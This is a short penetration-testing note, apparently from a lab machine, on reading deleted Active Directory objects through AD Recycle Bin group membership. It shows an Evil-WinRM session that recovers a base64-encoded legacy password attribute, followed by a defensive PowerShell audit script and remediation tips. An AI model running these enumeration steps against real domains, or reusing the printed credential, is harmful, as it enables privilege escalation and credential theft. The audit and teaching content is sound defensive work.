AD Recycle Bin

windows, ad, pivot, privesc

Overview #

An attacker who has compromised a low-privileged account that has been granted read access to deleted AD objects (here, membership in the AD Recycle Bin group) can retrieve sensitive information from them. While the Recycle Bin is enabled, a deleted object keeps its attributes for the deleted-object lifetime, so custom fields such as a legacy password attribute remain readable.

Environment Setup and Requirements #

Steps #

*Evil-WinRM* PS C:\users\arksvc> whoami /all | findstr /i recycle
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
*Evil-WinRM* PS C:\users\arksvc> 
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
*Evil-WinRM* PS C:\users> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * | findstr cascadeLegacyPwd
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
*Evil-WinRM* PS C:\users> 
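
The session above finds a base64-encoded legacy password on a deleted object. The following audit script is an added example, not part of the original notes: it enumerates deleted objects the same way and flags attributes whose name suggests a credential or whose value decodes as base64 to printable text (the cascadeLegacyPwd attribute above would be flagged on both counts). It assumes the ActiveDirectory module and read access to the Deleted Objects container; the attribute-name pattern and the noise list are heuristics chosen here.

```powershell
# Added audit script (not part of the original notes).
# Assumes the ActiveDirectory module and read rights on the Deleted Objects container.
Import-Module ActiveDirectory

# Standard attributes that are never interesting for this check (heuristic list).
$KnownNoise = @('objectGUID','objectSid','nTSecurityDescriptor','lastKnownParent',
                'dSCorePropagationData','whenChanged','whenCreated','uSNChanged','uSNCreated',
                'msDS-LastKnownRDN','DistinguishedName','ObjectClass','ObjectGUID','Name','Deleted')

# True when the string is valid base64 AND decodes to printable ASCII (a typical encoded secret).
function Test-LooksLikeEncodedText {
    param([string]$Value)
    if ($Value.Length -lt 8 -or ($Value.Length % 4) -ne 0) { return $false }
    if ($Value -notmatch '^[A-Za-z0-9+/]+={0,2}$') { return $false }
    try { $bytes = [Convert]::FromBase64String($Value) } catch { return $false }
    foreach ($b in $bytes) { if ($b -lt 0x20 -or $b -gt 0x7E) { return $false } }
    return $true
}

# Same enumeration as in the session above, with all attributes returned.
$deleted = Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Properties *

$findings = foreach ($obj in $deleted) {
    foreach ($prop in $obj.PropertyNames) {
        if ($KnownNoise -contains $prop) { continue }
        $val = $obj.$prop
        if ($null -eq $val) { continue }
        $text     = "$val"
        $nameHit  = $prop -match 'pwd|pass|secret|cred|key'
        $valueHit = Test-LooksLikeEncodedText $text
        if (-not ($nameHit -or $valueHit)) { continue }
        $reason = if ($nameHit) { 'attribute name suggests a credential' } else { 'base64 value decodes to printable text' }
        [pscustomobject]@{
            Object    = $obj.DistinguishedName
            Attribute = $prop
            Reason    = $reason
            Length    = $text.Length   # value length only; the value itself is not printed
        }
    }
}

$findings | Format-Table -AutoSize
```

Any hit is a candidate for clearing the attribute before the object was deleted (or for restricting who can read the Deleted Objects container), and for checking which non-admin principals hold List/Read rights on it.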

References #